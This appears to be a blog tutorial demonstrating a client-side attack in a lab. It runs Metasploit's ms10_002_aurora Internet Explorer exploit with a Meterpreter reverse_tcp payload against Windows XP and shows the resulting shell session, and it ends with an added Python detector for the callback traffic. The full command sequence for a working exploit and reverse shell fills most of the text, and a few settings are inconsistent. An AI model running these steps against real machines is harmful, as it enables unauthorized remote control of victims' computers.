Client Side Attacks
Client-side attacks are a class of attacks that target client-side applications, e.g. web browsers, download clients, etc. They differ from server-side attacks: instead of targeting vulnerabilities in server-side applications such as a web server, they target the application running on the client.
To demonstrate this attack we'll use the Metasploit Framework and one of its basic client-side exploits.
Lab Setup
The lab consists of a victim machine and an attacker machine.
Code:
+++++++++++++++++++                  +++++++++++++++++++++
+    Attacker     + ================ +  Victim Machine   +
+                 +    Behind NAT    +                   +
+++++++++++++++++++                  +++++++++++++++++++++
The victim machine is running an unpatched Windows XP SP1 with Internet Explorer 6, which is vulnerable to a client-side vulnerability.
Attacker
The attacker's machine is running BackTrack 5 with Metasploit installed.
I am using virtual machines to set up my lab, and the network type is set to NAT.
Now that we have set up our lab, let the hacking begin.
Exploitation
First, let's open the Metasploit console using 'msfconsole':
Code:
root@bt:~# msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|

       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf >
To use this exploit in Metasploit, simply use the 'use' command:
Code:
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >
Code:
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
Code:
msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) >
Now let's set some payload options:
Code:
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_002_aurora) > set LHOST 120.0.0.1
LHOST => 120.0.0.1
msf exploit(ms10_002_aurora) > set LPORT 31337
LPORT => 31337
msf exploit(ms10_002_aurora) >
Now that everything is set up, let's launch the exploit:
Code:
msf exploit(ms10_002_aurora) > exploit
Exploit running as background job.
Started reverse handler on 127.0.0.1:31337
Using URL: http://127.0.0.1:80/
Server started.
In this case I'll use the vulnerable IE browser on the victim machine to view this site. Now see what happens:
Code:
Sending stage (723456 bytes)
Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514)
msf exploit(ie_aurora) > sessions -i 1
Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\VICTIM
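
Seen from the defender's side, the session line above is the network footprint of this attack: the client fetches a page over HTTP and then opens an outbound TCP connection to the same host on a non-web port. The following is an added example, not part of the original tutorial, that correlates those two events; the flow-record format, the 60-second window and the sample records are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

WEB_PORTS = {80, 443, 8080}
WINDOW = timedelta(seconds=60)   # assumed correlation window

# Constructed flow records: "timestamp src_ip src_port dst_ip dst_port"
SAMPLE_FLOWS = """\
2011-06-01T10:00:00 192.168.0.2 1510 192.168.0.1 80
2011-06-01T10:00:03 192.168.0.2 1514 192.168.0.1 31337
2011-06-01T10:00:05 192.168.0.3 2001 192.168.0.10 80
2011-06-01T10:05:00 192.168.0.3 2002 192.168.0.10 31337
2011-06-01T10:06:00 192.168.0.4 3001 192.168.0.20 443
2011-06-01T10:06:02 192.168.0.4 3002 192.168.0.20 443
"""

def parse_flows(text):
    """Yield (time, src, dst, dst_port) tuples from the assumed log format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip blank or malformed lines
        ts, src, _sport, dst, dport = parts
        yield datetime.fromisoformat(ts), src, dst, int(dport)

def find_callbacks(text, window=WINDOW):
    """Flag clients that open a non-web connection to a host they just browsed."""
    last_web = {}   # (src, dst) -> time of the most recent web request
    alerts = []
    for when, src, dst, dport in sorted(parse_flows(text)):
        key = (src, dst)
        if dport in WEB_PORTS:
            last_web[key] = when
        elif key in last_web and when - last_web[key] <= window:
            delay = (when - last_web[key]).total_seconds()
            alerts.append((src, dst, dport, delay))
    return alerts

if __name__ == "__main__":
    for src, dst, port, delay in find_callbacks(SAMPLE_FLOWS):
        print(f"{src} browsed {dst}, then connected to port {port} after {delay:.0f}s")
```

Only the first client is flagged: the second one connects to the odd port well outside the window, and the third never leaves web ports.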
That's all for this tutorial; stay tuned for more.
Please leave a comment if I have done well or if you have finished learning from the blog.